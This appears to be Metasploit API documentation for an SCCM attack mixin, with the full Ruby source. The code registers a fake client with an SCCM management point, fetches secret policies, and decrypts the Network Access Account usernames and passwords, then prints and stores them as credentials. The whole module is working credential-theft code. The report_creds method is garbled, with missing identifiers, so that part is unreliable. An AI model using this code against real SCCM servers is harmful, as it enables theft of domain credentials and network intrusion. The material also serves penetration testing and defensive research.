Module: Msf::Exploit::Remote::HTTP::SCCM

Includes:
Auxiliary::Report, Msf::Exploit::Remote::HttpClient, Msf::Exploit::Retry
Defined in:
lib/msf/core/exploit/remote/http/sccm.rb

Overview

This module provides a way of interacting with SCCM servers

Constant Summary collapse

KEY_SIZE =
2048
SECRET_POLICY_FLAG =
4

Instance Attribute Summary

Attributes included from Msf::Exploit::Remote::HttpClient

#client, #cookie_jar

Instance Method Summary collapse

Methods included from Msf::Exploit::Remote::HttpClient

#basic_auth, #cleanup, #configure_http_login_scanner, #connect, #connect_ws, #deregister_http_client_options, #disconnect, #download, #full_uri, #handler, #http_fingerprint, #initialize, #lookup_http_fingerprints, #normalize_uri, #path_from_uri, #peer, #proxies, #reconfig_redirect_opts!, #request_opts_from_url, #request_url, #rhost, #rport, #send_request_cgi, #send_request_cgi!, #send_request_raw, #service_details, #setup, #ssl, #ssl_version, #sslkeylogfile, #strip_tags, #target_uri, #validate_fingerprint, #vhost

Methods included from Auxiliary::LoginScanner

#configure_login_scanner

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from Msf::Exploit::Retry

#retry_until_truthy

Instance Method Details

#deobfuscate_policy_value(value) ⇒ Object



290
291
292
293
294
295
296
297
298
299
300
301
302
303
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 290

def deobfuscate_policy_value(value)
  value = [value.gsub(/[^0-9A-Fa-f]/, '')].pack('H*')
  data_length = value[52..55].unpack('I')[0]
  buffer = value[64..64 + data_length - 1]
  key = mscrypt_derive_key_sha1(value[4..43])
  iv = "\x00" * 8
  cipher = OpenSSL::Cipher.new('des-ede3-cbc')
  cipher.decrypt
  cipher.iv = iv
  cipher.key = key
  result = cipher.update(buffer) + cipher.final

  result.force_encoding('utf-16le').encode('utf-8')
end

#generate_key_and_cert(subject) ⇒ Object

Create a self-signed private key and certificate for our computer registration



330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 330

def generate_key_and_cert(subject)
  key = OpenSSL::PKey::RSA.new(KEY_SIZE)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = (rand(0xFFFFFFFF) << 32) + rand(0xFFFFFFFF)
  cert.public_key = key.public_key
  cert.issuer = OpenSSL::X509::Name.new([['CN', subject]])
  cert.subject = OpenSSL::X509::Name.new([['CN', subject]])
  yr = 24 * 3600 * 365
  cert.not_before = Time.at(Time.now.to_i - rand(yr * 3) - yr)
  cert.not_after = Time.at(cert.not_before.to_i + (rand(4..9) * yr))
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate = cert
  cert.extensions = [
    ef.create_extension('keyUsage', 'digitalSignature,dataEncipherment'),
    ef.create_extension('extendedKeyUsage', '1.3.6.1.4.1.311.101.2, 1.3.6.1.4.1.311.101'),
  ]
  cert.sign(key, OpenSSL::Digest.new('SHA256'))

  [key, cert]
end

#get_creds_from_policy_doc(policy) ⇒ Object

Extract obfuscated credentials from the resulting policy XML document



269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 269

def get_creds_from_policy_doc(policy)
  xml_doc = Nokogiri::XML(policy)
  naa_sections = xml_doc.xpath(".//instance[@class='CCM_NetworkAccessAccount']")
  results = []
  naa_sections.each do |section|
    username = section.xpath("property[@name='NetworkAccessUsername']/value").text
    username = deobfuscate_policy_value(username)
    username.delete_suffix!("\x00")

    password = section.xpath("property[@name='NetworkAccessPassword']/value").text
    password = deobfuscate_policy_value(password)
    password.delete_suffix!("\x00")

    unless username.blank? && password.blank?
      # Deleted credentials seem to result in just an empty value for username and password
      results.append([username, password])
    end
  end
  results
end

#get_naa_credentials(opts, management_point, site_code, computer_user) ⇒ Object



20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 20

def get_naa_credentials(opts, management_point, site_code, computer_user)
  key, cert = generate_key_and_cert('ConfigMgr Client')

  http_opts = opts.merge({
    'rhost' => management_point,
    'rport' => 80,
    'headers' => {
      'User-Agent' => 'ConfigMgr Messaging HTTP Sender',
      'Accept-Encoding' => 'gzip, deflate',
      'Accept' => '*/*'
    }
  })

  sms_id, ip_address = register_request(http_opts, management_point, key, cert, computer_user)
  secret_urls = retry_until_truthy(timeout: 30) { get_secret_policies(http_opts, management_point, site_code, key, cert, sms_id, computer_user) }
  all_results = Set.new
  secret_urls.each do |url|
    decrypted_policy = request_policy(http_opts, url, sms_id, key)
    results = get_creds_from_policy_doc(decrypted_policy)
    all_results.merge(results)
  end

  if all_results.empty?
    print_status('No NAA credentials configured')
  end

  all_results.each do |username, password|
    report_creds(ip_address, username, password)
    print_good("Found valid NAA credentials: #{username}:#{password}")
  end
rescue SocketError => e
  fail_with(Msf::Module::Failure::Unreachable, e.message)
end

#get_secret_policies(http_opts, management_point, site_code, key, cert, sms_id, computer_user) ⇒ Object



54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 54

def get_secret_policies(http_opts, management_point, site_code, key, cert, sms_id, computer_user)
  fqdn = "#{computer_user}.#{datastore['DOMAIN']}"
  hex_pub_key = make_ms_pubkey(cert.public_key)
  guid = SecureRandom.uuid.upcase
  sent_time = Time.now.utc.iso8601
  sccm_host = management_point.downcase
  request_assignments = "<RequestAssignments SchemaVersion=\"1.00\" ACK=\"false\" RequestType=\"Always\"><Identification><Machine><ClientID>GUID:#{sms_id}</ClientID><FQDN>#{fqdn}</FQDN><NetBIOSName>#{computer_user}</NetBIOSName><SID /></Machine><User /></Identification><PolicySource>SMS:#{site_code}</PolicySource><Resource ResourceType=\"Machine\" /><ServerCookie /></RequestAssignments>\x00"
  request_assignments.encode!('utf-16le')
  body_length = request_assignments.bytes.length
  request_assignments = request_assignments.bytes.pack('C*') + "\r\n"
  compressed = Rex::Text.zlib_deflate(request_assignments)

  payload_signature = rsa_sign(key, compressed)

  client_id = "GUID:{#{sms_id.upcase}}\x00"
  client_ids_signature = rsa_sign(key, client_id.encode('utf-16le'))
  header = "<Msg ReplyCompression=\"zlib\" SchemaVersion=\"1.1\"><Body Type=\"ByteRange\" Length=\"#{body_length}\" Offset=\"0\" /><CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID><Hooks><Hook2 Name=\"clientauth\"><Property Name=\"AuthSenderMachine\">#{computer_user}</Property><Property Name=\"PublicKey\">#{hex_pub_key}</Property><Property Name=\"ClientIDSignature\">#{client_ids_signature}</Property><Property Name=\"PayloadSignature\">#{payload_signature}</Property><Property Name=\"ClientCapabilities\">NonSSL</Property><Property Name=\"HashAlgorithm\">1.2.840.113549.1.1.11</Property></Hook2><Hook3 Name=\"zlib-compress\" /></Hooks><ID>{#{guid}}</ID><Payload Type=\"inline\" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:#{computer_user}:SccmMessaging</ReplyTo><SentTime>#{sent_time}</SentTime><SourceID>GUID:#{sms_id}</SourceID><SourceHost>#{computer_user}</SourceHost><TargetAddress>mp:MP_PolicyManager</TargetAddress><TargetEndpoint>MP_PolicyManager</TargetEndpoint><TargetHost>#{sccm_host}</TargetHost><Timeout>60000</Timeout></Msg>"

  message = Rex::MIME::Message.new
  message.bound = 'aAbBcCdDv1234567890VxXyYzZ'

  message.add_part("\ufeff#{header}".encode('utf-16le').bytes.pack('C*'), 'text/plain; charset=UTF-16', nil)
  message.add_part(compressed, 'application/octet-stream', 'binary')
  opts = http_opts.merge({
    'uri' => '/ccm_system/request',
    'method' => 'CCM_POST',
    'data' => message.to_s
  })
  opts['headers'] = opts['headers'].merge({
    'Content-Type' => 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"'
  })
  http_response = send_request_raw(opts)
  response = Rex::MIME::Message.new(http_response.to_s)

  return nil unless response.parts[1]&.content
  compressed_response = Rex::Text.zlib_inflate(response.parts[1].content).force_encoding('utf-16le')
  xml_doc = Nokogiri::XML(compressed_response.encode('utf-8'))
  policies = xml_doc.xpath('//Policy')
  secret_policies = policies.select do |policy|
    flags = policy.attributes['PolicyFlags']
    next if flags.nil?

    flags.value.to_i & SECRET_POLICY_FLAG == SECRET_POLICY_FLAG
  end

  urls = secret_policies.map do |policy|
    policy.xpath('PolicyLocation/text()').text
  end

  urls = urls.reject(&:blank?)

  urls.each do |url|
    print_status("Found policy containing secrets: #{url}")
  end

  urls
end

#make_ms_pubkey(pub_key) ⇒ Object



260
261
262
263
264
265
266
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 260

def make_ms_pubkey(pub_key)
  result = "\x06\x02\x00\x00\x00\xA4\x00\x00\x52\x53\x41\x31"
  result += [KEY_SIZE, pub_key.e].pack('II')
  result += [pub_key.n.to_s(16)].pack('H*')

  result.unpack('H*')[0]
end

#mscrypt_derive_key_sha1(secret) ⇒ Object



305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 305

def mscrypt_derive_key_sha1(secret)
  buf1 = [0x36] * 64
  buf2 = [0x5C] * 64

  digest = OpenSSL::Digest.new('SHA1')
  hash = digest.digest(secret).bytes

  hash.each_with_index do |byte, i|
    buf1[i] ^= byte
    buf2[i] ^= byte
  end

  buf1 = buf1.pack('C*')
  buf2 = buf2.pack('C*')

  digest = OpenSSL::Digest.new('SHA1')
  hash1 = digest.digest(buf1)

  digest = OpenSSL::Digest.new('SHA1')
  hash2 = digest.digest(buf2)

  hash1 + hash2[0..3]
end

#register_request(http_opts, management_point, key, cert, computer_user) ⇒ Object

Make a request to the SCCM server to register our computer



113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 113

def register_request(http_opts, management_point, key, cert, computer_user)
  pub_key = cert.to_der.unpack('H*')[0].upcase

  fqdn = "#{computer_user}.#{datastore['DOMAIN']}"
  sent_time = Time.now.utc.iso8601
  registration_request_data = "<Data HashAlgorithm=\"1.2.840.113549.1.1.11\" SMSID=\"\" RequestType=\"Registration\" TimeStamp=\"#{sent_time}\"><AgentInformation AgentIdentity=\"CCMSetup.exe\" AgentVersion=\"5.00.8325.0000\" AgentType=\"0\" /><Certificates><Encryption Encoding=\"HexBinary\" KeyType=\"1\">#{pub_key}</Encryption><Signing Encoding=\"HexBinary\" KeyType=\"1\">#{pub_key}</Signing></Certificates><DiscoveryProperties><Property Name=\"Netbios Name\" Value=\"#{computer_user}\" /><Property Name=\"FQ Name\" Value=\"#{fqdn}\" /><Property Name=\"Locale ID\" Value=\"1033\" /><Property Name=\"InternetFlag\" Value=\"0\" /></DiscoveryProperties></Data>"

  signature = rsa_sign(key, registration_request_data.encode('utf-16le'))

  registration_request = "<ClientRegistrationRequest>#{registration_request_data}<Signature><SignatureValue>#{signature}</SignatureValue></Signature></ClientRegistrationRequest>\x00"

  rr_utf16 = ''
  rr_utf16 << registration_request.encode('utf-16le').bytes.pack('C*')
  body_length = rr_utf16.length
  rr_utf16 << "\r\n"

  header = "<Msg ReplyCompression=\"zlib\" SchemaVersion=\"1.1\"><Body Type=\"ByteRange\" Length=\"#{body_length}\" Offset=\"0\" /><CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID><Hooks><Hook3 Name=\"zlib-compress\" /></Hooks><ID>{5DD100CD-DF1D-45F5-BA17-A327F43465F8}</ID><Payload Type=\"inline\" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:#{computer_user}:SccmMessaging</ReplyTo><SentTime>#{sent_time}</SentTime><SourceHost>#{computer_user}</SourceHost><TargetAddress>mp:MP_ClientRegistration</TargetAddress><TargetEndpoint>MP_ClientRegistration</TargetEndpoint><TargetHost>#{management_point.downcase}</TargetHost><Timeout>60000</Timeout></Msg>"

  message = Rex::MIME::Message.new
  message.bound = 'aAbBcCdDv1234567890VxXyYzZ'

  message.add_part("\ufeff#{header}".encode('utf-16le').bytes.pack('C*'), 'text/plain; charset=UTF-16', nil)
  message.add_part(Rex::Text.zlib_deflate(rr_utf16), 'application/octet-stream', 'binary')

  opts = http_opts.merge({
    'uri' => '/ccm_system_windowsauth/request',
    'method' => 'CCM_POST',
    'data' => message.to_s
  })
  opts['headers'] = opts['headers'].merge({
    'Content-Type' => 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"'
  })
  http_response = send_request_raw(opts)
  if http_response.nil?
    fail_with(Msf::Module::Failure::Unreachable, 'No response from server')
  end
  ip_address = http_response.peerinfo['addr']
  response = Rex::MIME::Message.new(http_response.to_s)
  if response.parts.empty?
    html_doc = Nokogiri::HTML(http_response.to_s)
    error = html_doc.xpath('//title').text
    if error.blank?
      error = 'Bad response from server'
      dlog('Response from server:')
      dlog(http_response.to_s)
    end
    fail_with(Msf::Module::Failure::UnexpectedReply, error)
  end

  response.parts[0].content.force_encoding('utf-16le').encode('utf-8').delete_prefix("\uFEFF")
  compressed_response = Rex::Text.zlib_inflate(response.parts[1].content).force_encoding('utf-16le')
  xml_doc = Nokogiri::XML(compressed_response.encode('utf-8')) # It's crazy, but XML parsing doesn't work with UTF-16-encoded strings
  sms_id = xml_doc.root&.attributes&.[]('SMSID')&.value&.delete_prefix('GUID:')
  if sms_id.nil?
    approval = xml_doc.root&.attributes&.[]('ApprovalStatus')&.value
    if approval == '-1'
      fail_with(Msf::Module::Failure::UnexpectedReply, 'Client registration not approved by SCCM server')
    end
    fail_with(Msf::Module::Failure::UnexpectedReply, 'Did not retrieve SMS ID')
  end
  print_status("Got SMS ID: #{sms_id}")

  [sms_id, ip_address]
end

#report_creds(ip_address, user, password) ⇒ Object



353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 353

def report_creds(ip_address, user, password)
  service_data = {
    address: ip_address,
    port: rport,
    protocol: 'tcp',
    service_name: 'sccm',
    workspace_id: myworkspace_id
  }

  domain,  = user.split(/\\/)
  credential_data = {
    origin_type: :service,
    module_fullname: fullname,
    username: ,
    private_data: password,
    private_type: :password,
    realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
    realm_value: domain
  }
  credential_core = create_credential(credential_data.merge(service_data))

   = {
    core: credential_core,
    status: Metasploit::Model::Login::Status::UNTRIED
  }

  (.merge(service_data))
end

#request_policy(http_opts, policy_url, sms_id, key) ⇒ Object

Request the policy from the policy_url



179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 179

def request_policy(http_opts, policy_url, sms_id, key)
  policy_url.gsub!(%r{^https?://<mp>}, '')
  policy_url = policy_url.gsub('{', '%7B').gsub('}', '%7D')

  now = Time.now.utc.iso8601
  client_token = "GUID:#{sms_id};#{now};2"
  client_signature = rsa_sign(key, (client_token + "\x00").encode('utf-16le').bytes.pack('C*'))

  opts = http_opts.merge({
    'uri' => policy_url,
    'method' => 'GET'
  })
  opts['headers'] = opts['headers'].merge({
    'ClientToken' => client_token,
    'ClientTokenSignature' => client_signature
  })

  http_response = send_request_raw(opts)
  http_response.gzip_decode!

  ci = Rex::Proto::CryptoAsn1::Cms::ContentInfo.parse(http_response.body)
  cms_envelope = ci.enveloped_data

  ri = cms_envelope[:recipient_infos]
  if ri.value.empty?
    fail_with(Msf::Module::Failure::UnexpectedReply, 'No recipient infos provided')
  end

  if ri[0][:ktri].nil?
    fail_with(Msf::Module::Failure::UnexpectedReply, 'KeyTransRecipientInfo not found')
  end

  body = cms_envelope[:encrypted_content_info][:encrypted_content].value

  key_encryption_alg = ri[0][:ktri][:key_encryption_algorithm][:algorithm].value
  encrypted_rsa_key = ri[0][:ktri][:encrypted_key].value
  if key_encryption_alg == Rex::Proto::CryptoAsn1::OIDs::OID_RSA_ENCRYPTION.value
    decrypted_key = key.private_decrypt(encrypted_rsa_key)
  elsif key_encryption_alg == Rex::Proto::CryptoAsn1::OIDs::OID_RSAES_OAEP.value
    decrypted_key = key.private_decrypt(encrypted_rsa_key, OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING)
  else
    fail_with(Msf::Module::Failure::UnexpectedReply, "Key encryption routine is currently unsupported: #{key_encryption_alg}")
  end

  cea = cms_envelope[:encrypted_content_info][:content_encryption_algorithm]
  algorithms = {
    Rex::Proto::CryptoAsn1::OIDs::OID_AES256_CBC.value => { iv_length: 16, key_length: 32, cipher_name: 'aes-256-cbc' },
    Rex::Proto::CryptoAsn1::OIDs::OID_DES_EDE3_CBC.value => { iv_length: 8, key_length: 24, cipher_name: 'des-ede3-cbc' }
  }
  if algorithms.include?(cea[:algorithm].value)
    alg_hash = algorithms[cea[:algorithm].value]
    if decrypted_key.length != alg_hash[:key_length]
      fail_with(Msf::Module::Failure::UnexpectedReply, "Bad key length: #{decrypted_key.length}")
    end
    iv = RASN1::Types::OctetString.new
    iv.parse!(cea[:parameters].value)
    if iv.value.length != alg_hash[:iv_length]
      fail_with(Msf::Module::Failure::UnexpectedReply, "Bad IV length: #{iv.length}")
    end
    cipher = OpenSSL::Cipher.new(alg_hash[:cipher_name])
    cipher.decrypt
    cipher.key = decrypted_key
    cipher.iv = iv.value

    decrypted = cipher.update(body) + cipher.final
  else
    fail_with(Msf::Module::Failure::UnexpectedReply, "Decryption routine is currently unsupported: #{cea[:algorithm].value}")
  end

  decrypted.force_encoding('utf-16le').encode('utf-8').delete_suffix("\x00")
end

#rsa_sign(key, data) ⇒ Object

Sign the data using the RSA key, and reverse it (strange, but it’s what’s required)



252
253
254
255
256
257
# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 252

def rsa_sign(key, data)
  signature = key.sign(OpenSSL::Digest.new('SHA256'), data)
  signature.reverse!

  signature.unpack('H*')[0].upcase
end